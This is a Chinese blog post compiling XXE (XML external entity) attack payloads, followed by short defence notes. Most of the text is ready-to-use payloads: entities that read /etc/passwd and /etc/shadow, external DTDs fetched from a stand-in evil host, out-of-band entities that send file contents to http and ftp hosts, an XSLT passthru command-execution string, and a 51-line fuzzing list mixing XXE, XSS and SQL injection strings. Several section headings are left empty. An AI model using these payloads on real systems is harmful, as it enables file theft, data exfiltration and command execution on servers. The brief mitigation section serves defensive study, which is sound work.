• 应用安全-XXE(XML外部实体注入)攻防整理

    libxml2.9.1及以后,默认不解析外部实体。测试的时候window下使用php5.2(libxml Version 2.7.7 ), php5.3(libxml Version 2.7.8)。Linux中需要将libxml低于libxml2.9.1的版本编译到PHP中,可使用phpinfo()查看libxml的版本信息

    外部实体注入 - 通过DTD外部实体声明

    payload-1
    <?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "file://etc/passwd">]>
<c>&b;</c>

    payload-2

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <user>
    <firstname>&xxe;</firstname>
    <lastname>melody</lastname>
    </user>

    外部实体注入 - 通过DTD文档引入外部DTD文档,再引入外部实体声明

    <?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd">
<c>&b;</c>

DTD内容:
<!ENTITY b SYSTEM "file:///etc/passwd">

    外部实体注入 - 通过DTD引入外部实体声明

    <?xml version="1.0">
<!DOCTYPE a [
<!ENTITY % d SYSTEM "http://mark4z5.com/evil.dtd">
%d;
]>
<c>&b;</c>

DTD内容:
<!ENTITY b SYSTEM "file///etc/passwd">

    XMLDTD部分支持协议

    libxml2    file http ftp
                
PHP    file http ftp php compress.zlib compress.bzip2 data glob phar                
    扩展支持部分:
    https/ftps openssl
    zip zip
    ssh2.shell/ssh2.exec/ssh2.tunnel/ssh2.sftp/ssh2.scp  ssh2
    rar  rar
    ogg  oggvorbis
    expect  expect        
    
Java    http https ftp file jar netdoc mailto gopher *     
            
.NET    file http https ftp

    工具 - burp - Collaborator 

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "http://collaborator生成的随机值">
]>
    XML语句

    XML Schema 实体的攻击 - schemaLocation

    XML Schema 实体的攻击 - schemaLocation


    XML Schema 实体的攻击 - noNamespaceSchemaLocation


    XML Schema 实体的攻击 - XInclude。


    XML Schema 实体的攻击 - XSLT 攻击

    XXE - 读取任意文件


    XXE - 执行系统命令


    XXE - 探测内网端口


    XXE - 攻击内网网站


    XXE - DDOS攻击

     

    防御 - 禁用外部实体

    PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

    防御 -  过滤用户提交的XML数据

    关键字:<!DOCTYPE、<!ENTITY、SYSTEM、PUBLIC

    Fuzzing

     1 <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
 2 <?xml version="1.0" encoding="ISO-8859-1"?>
 3 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
 4 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
 5 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
 6 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
 7 <?xml version="1.0" encoding="ISO-8859-1"?><test></test>
 8 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
 9 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
10 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
11 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
12 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
13 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
14 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
15 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
16 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
17 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
18 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
19 <test></test>
20 <![CDATA[<test></test>]]>
21 &foo;
22 %foo;
23 count(/child::node())
24 x' or name()='username' or 'x'='y
25 <name>','')); phpinfo(); exit;/*</name>
26 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
27 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
28 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
29 <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
30 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
31 <foo><![CDATA[' or 1=1 or ''=']]></foo>
32 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
33 <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
34 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
35 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
36 <xml SRC="xsstest.xml" ID=I></xml>
37 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
38 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
39 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
40 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
41 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>
42 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
43 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
44 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
45 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
46 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
47 <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int;
48 <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
49 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
50 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
51 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

    检测工具

    XXEinjector  -  基于Ruby
  • 相关阅读:
    asp.net微信开发第八篇----永久素材管理
    selenium模块
    request模块
    爬虫基本概念
    反向生成url
    admin的路由系统剖析
    popup方法
    ModelForm
    Django数据库操作性能相关
    缓存
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11261653.html
Copyright © 2020-2023  润新知